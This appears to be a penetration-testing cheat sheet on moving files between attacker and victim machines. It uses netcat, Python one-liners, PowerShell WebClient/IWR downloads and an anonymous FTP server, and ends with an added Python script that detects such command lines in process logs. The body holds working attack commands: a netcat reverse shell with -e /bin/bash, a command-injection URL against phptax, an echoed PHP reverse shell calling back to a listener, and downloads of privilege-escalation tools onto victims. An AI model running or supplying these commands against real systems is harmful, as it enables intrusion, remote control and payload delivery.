Seems odd that the sender machine would be listening, whereby listening would imply waiting and not sending.
In Linux
##Sender Machine
nc -v -w 40 -p 443 -l < file.php
Linux
###Receiver Machine
nc -v -w 10 192.168.0.100 443 > file.php
Sending from Linux to Windows
We first set up a listener and tell netcat to write whatever arrives to a file name of our choice, regardless of what the file is.
Linux
##Sender Machine
nc -nv 10.0.0.22 4444 < /usr/bin/wget.exe
Windows
##Receiver Machine
nc -nlvp 4444 > incomingfile.exe
-----------------------------------------------------------------------------------------------------------
Sender
Windows
nc.exe -w 3 1.1.1.1 6667 < file
Receiver
Linux
nc -lvp 6667 > file
---------------------------------------------------------------------------------------------------------
Sending a Reverse Shell - This is when the sending machine gives control of its system to the receiver.
###Sender Machine
nc -nv 10.0.0.22 443 -e /bin/bash
###Receiver Machine
nc -nlvp 443
Using Python like Wget - test it first
python.exe -c "import sys; print(sys.version_info)"
Sender
C:\python26\python.exe -c "import urllib2; u = urllib2.urlopen('http://10.11.0.108:4445/35936.py'); localFile = open('local_file', 'w') ; localFile.write(u.read()); localFile.close()"
Receiver
python -m SimpleHTTPServer 4445
Side Note:
If you can't create reverse or bind shells, then try to create a file.
Using this logic we can try to make a file with the PHP information of the system (phpinfo)
Something similar to this:
http://192.168.198.138:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo "<?php phpinfo() ?>" > a.php;&pdf=make
If we can make files, then we can try a simple PHP shell - remember to escape the "$"
echo "\$sock=fsockopen('192.168.0.100',4444);exec('/bin/sh -i <&3 >&3 2>&3');" > shell4.php
---------------------------------------------------------------------------------
Using Powershell
Attacker
Set up an HTTP listener (python -m SimpleHTTPServer 8989)
Victim
(new-object System.Net.WebClient).DownloadFile('http://10.11.0.48:8989/windows-privesc-check2.exe','C:\Windows\Temp\windows-privesc-check2.exe')
-------------------------------------------------------------------------------
Ftp files using Python (useful for windows)
Login with user - anonymous
Pass - anonymous
Hacker
python -m pyftpdlib -w -p 21
Victim
ftp IP
anonymous
anonymous
------------------------------------------------------------------------------
Powershell
(New-Object Net.WebClient).DownloadFile('http://whatever.com/file.exe', 'file.exe')
OR
IWR -Uri http://whatever.com/file.exe -OutFile file.exe
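
From the defender's side, the commands in this cheat sheet leave recognisable process command lines. The sketch below is an added example, not part of the original post: it flags those command lines in process-creation logs. The rule names, the `http.server` pattern (the Python 3 counterpart of SimpleHTTPServer) and the sample lines with 192.0.2.x addresses are constructed for illustration.

```python
import re

# Shared prefix: a netcat binary, then a flag token preceded by whitespace.
NC = r"\b(?:nc|ncat|netcat)(?:\.exe)?\s.*(?<!\S)"

# Rule names are hypothetical labels chosen for this example.
RULES = [
    ("netcat_exec", re.compile(NC + r"-[a-z]*e\s+\S+", re.I)),
    ("netcat_listener", re.compile(NC + r"-[a-z]*l[a-z]*\b", re.I)),
    ("webclient_downloadfile",
     re.compile(r"Net\.WebClient\)?\s*\.DownloadFile\(", re.I)),
    ("iwr_outfile",
     re.compile(r"\b(?:iwr|Invoke-WebRequest)\b.*-OutFile\b", re.I)),
    ("python_urlopen_oneliner",
     re.compile(r"python[\w.]*\s+-c\s.*urlopen\(", re.I)),
    ("adhoc_file_server",
     re.compile(r"python[\w.]*\s+-m\s+(?:SimpleHTTPServer|http\.server|pyftpdlib)\b", re.I)),
]

def classify(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(lines):
    """Map each flagged command line to its rule hits; clean lines are omitted."""
    hits = {}
    for line in lines:
        matched = classify(line)
        if matched:
            hits[line] = matched
    return hits

# Constructed sample of process command lines (last two are benign controls).
SAMPLE = r'''
nc -nlvp 443
nc -nv 192.0.2.22 443 -e /bin/bash
C:\python26\python.exe -c "import urllib2; u = urllib2.urlopen('http://192.0.2.10:4445/a.py')"
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10:8989/a.exe','C:\Windows\Temp\a.exe')"
powershell IWR -Uri http://192.0.2.10/file.exe -OutFile file.exe
python -m SimpleHTTPServer 4445
python -m pyftpdlib -w -p 21
python manage.py runserver
nc -zv 192.0.2.5 22
'''.strip().splitlines()

if __name__ == "__main__":
    for line, rules in scan(SAMPLE).items():
        print(",".join(rules), "|", line)
```

Shell redirections such as `< file` and `> file` are consumed by the shell and do not appear in a process's recorded arguments, which is why the netcat rules key on flags (`-l`, `-e`) rather than on the redirect.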